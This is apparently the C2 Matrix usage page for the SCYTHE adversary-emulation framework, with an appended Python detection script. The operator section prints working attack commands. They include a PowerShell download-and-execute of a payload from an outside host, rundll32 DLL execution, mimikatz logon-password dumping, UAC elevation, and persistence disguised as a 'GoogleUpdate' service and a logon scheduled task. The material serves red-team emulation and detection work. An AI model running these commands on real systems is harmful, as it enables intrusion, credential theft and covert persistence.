C2 Matrix

SCYTHE


Last updated 4 years ago


Setup Campaign

Log in to your SCYTHE instance via a web browser. The default port is 8443 (for a local instance, https://localhost:8443).

Campaign Manager - New Campaign

Select the following options:

  • Name: unique name for the campaign

  • Target Operating System: Windows, Linux, or macOS

  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date

  • Communication Module:

    • HTTPS is the default

    • DNS, HTTP, and Stego require relays to be installed on a redirector

    • Google Sheet and Twitter require a third-party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from the SCYTHE GitHub repository (https://github.com/scythe-io/community-threats):

Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute it by double-clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download the DLL file from SCYTHE and execute the following from cmd.exe:

rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open powershell.exe and run:

$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename" 

Download files

Move the file to the virtual file system (VFS), then download it to the target with the downloader module:

loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate 
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist 

Syntax:
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"

Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown
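As an added example (not part of the C2 Matrix page or of SCYTHE's own tooling), the detection side of the Deploy Payload and Persistence techniques above: process-command-line rules for rundll32 loading a DLL outside the Windows system directories, a logon scheduled task whose action is cmd /k or rundll32, and the PowerShell WebClient download-and-execute into C:\Users\Public, run over constructed sample command lines (the username alice and the benign events are made up).

```python
import re

# Constructed process-creation command lines (not real telemetry), shaped like
# the CommandLine field of a Sysmon Event ID 1 or Windows 4688 record.
SAMPLE_EVENTS = [
    r"rundll32.exe ServiceLogin.dll,PlatformClientMain",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r'schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\alice\DNS_scythe_client32.dll,PlatformClientMain"',
    r"powershell.exe $wc=New-Object System.Net.WebClient;$wc.DownloadFile($url,'C:\Users\Public\scythe_payload.exe');C:\Users\Public\scythe_payload.exe",
    r"schtasks /query /tn Backup",
]

SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\", re.I)
RUNDLL_DLL = re.compile(r'rundll32(?:\.exe)?\s+"?([^,"\s]+\.dll)', re.I)
SCHTASK_CREATE = re.compile(r'/create\b.*?/sc\s+(onlogon|onstart)\b.*?/tr\s+"?(.+)', re.I)
PROXY_ACTION = re.compile(r"rundll32|cmd(?:\.exe)?\s+/[kc]\b", re.I)
PUBLIC_PATH = re.compile(r"[a-z]:\\users\\public\\", re.I)

def rundll32_nonsystem_dll(cmdline):
    """T1218.011: rundll32 loading a DLL that is not under a Windows system directory."""
    m = RUNDLL_DLL.search(cmdline)
    if m and not SYSTEM_DIRS.match(m.group(1)):
        return f"rundll32 loads DLL outside system directories: {m.group(1)}"
    return None

def logon_task_proxy_exec(cmdline):
    """Task created to run at logon/startup whose action is a proxy executor (cmd /k, rundll32)."""
    m = SCHTASK_CREATE.search(cmdline)
    if m and PROXY_ACTION.search(m.group(2)):
        return f"{m.group(1).upper()} task runs a proxy-execution action: {m.group(2)}"
    return None

def powershell_download_exec(cmdline):
    """T1059.001: WebClient.DownloadFile into C:\\Users\\Public followed by execution from there."""
    if "downloadfile(" in cmdline.lower() and PUBLIC_PATH.search(cmdline):
        return "PowerShell download-and-execute via C:\\Users\\Public"
    return None

RULES = (rundll32_nonsystem_dll, logon_task_proxy_exec, powershell_download_exec)

def triage(cmdlines):
    """Run every rule over every command line; returns (event index, rule name, message) tuples."""
    findings = []
    for i, cl in enumerate(cmdlines):
        for rule in RULES:
            msg = rule(cl)
            if msg:
                findings.append((i, rule.__name__, msg))
    return findings
```

Running `triage(SAMPLE_EVENTS)` flags the first, third and fourth constructed events and leaves the two benign ones alone; in a real pipeline the same rules would consume the CommandLine field of your process-creation telemetry.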